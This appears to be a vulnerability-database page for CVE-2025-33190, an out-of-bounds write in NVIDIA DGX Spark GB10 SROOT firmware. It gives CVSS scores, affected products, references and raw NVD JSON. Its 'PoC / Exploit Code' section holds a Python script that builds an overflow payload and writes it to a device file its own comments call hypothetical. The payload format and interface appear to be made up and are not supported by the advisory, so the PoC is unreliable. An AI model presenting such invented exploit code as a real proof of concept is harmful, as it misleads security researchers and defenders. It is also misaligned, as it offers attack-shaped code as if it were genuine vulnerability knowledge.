CVE-2025-33190

Description

NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware where an attacker could cause an out-of-bound write. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, or escalation of privileges.

CVSS Details

CVSS Score

6.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:nvidia:dgx_os:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:nvidia:dgx_spark:-:*:*:*:*:*:*:* - NOT VULNERABLE

NVIDIA DGX Spark GB10 (SROOT firmware < fixed version)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-33190 PoC - Conceptual Proof of Concept
# Note: This is a conceptual demonstration for educational purposes only
# Actual exploitation requires physical/local access to NVIDIA DGX Spark GB10

import struct
import sys

def generate_malicious_sroot_payload():
    """
    Generate conceptual payload for SROOT firmware vulnerability
    This demonstrates the out-of-bound write concept
    """
    # SROOT firmware header
    header = b'SROOT\x00\x00\x00'
    
    # Command type: trigger OOB write
    cmd_type = struct.pack('<I', 0x1001)
    
    # Malicious payload causing buffer overflow
    # This would overwrite adjacent memory regions
    overflow_size = 0x1000  # Overflow size
    overflow_data = b'A' * overflow_size
    
    # Target address manipulation (conceptual)
    target_addr = struct.pack('<Q', 0xFFFFFFFFFFFFFFFF)
    
    payload = header + cmd_type + target_addr + overflow_data
    
    return payload

def send_sroot_command(payload):
    """
    Send malicious payload to SROOT firmware interface
    Requires: Local access + High privileges
    """
    # Conceptual device interface
    sroot_device = '/dev/sroot0'  # Hypothetical device
    
    try:
        with open(sroot_device, 'wb') as f:
            f.write(payload)
            print('[+] Malicious payload sent to SROOT firmware')
            return True
    except PermissionError:
        print('[-] Error: Insufficient privileges (PR:H required)')
        return False
    except FileNotFoundError:
        print('[-] Error: SROOT device not found')
        return False

if __name__ == '__main__':
    print('CVE-2025-33190 Conceptual PoC')
    print('Target: NVIDIA DGX Spark GB10 SROOT Firmware')
    print('Vulnerability: Out-of-Bound Write')
    print('-' * 50)
    
    payload = generate_malicious_sroot_payload()
    print(f'[*] Generated payload: {len(payload)} bytes')
    print('[*] Attempting to send payload...')
    
    send_sroot_command(payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-33190
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-33190
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-33190/
[4] VulDB https://vuldb.com/cve/CVE-2025-33190
[5] https://nvd.nist.gov/vuln/detail/CVE-2025-33190
[6] https://nvidia.custhelp.com/app/answers/detail/a_id/5720
[7] https://www.cve.org/CVERecord?id=CVE-2025-33190

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-33190", "sourceIdentifier": "[email protected]", "published": "2025-11-25T18:15:50.500", "lastModified": "2025-12-02T18:19:45.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware where an attacker could cause an out-of-bound write. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, or escalation of privileges."}, {"lang": "es", "value": "NVIDIA DGX Spark GB10 contiene una vulnerabilidad en el firmware SROOT donde un atacante podría causar una escritura fuera de límites. Un exploit exitoso de esta vulnerabilidad podría llevar a la ejecución de código, manipulación de datos, denegación de servicio o escalada de privilegios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nvidia:dgx_os:-:*:*:*:*:*:*:*", "matchCriteriaId": "40EF912C-72C4-4758-9157-169CE92B33C5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:dgx_spark:-:*:*:*:*:*:*:*", "matchCriteriaId": "76975E53-4E5C-4C6D-85D9-EE2879F960DF"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33190", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5720", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33190", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}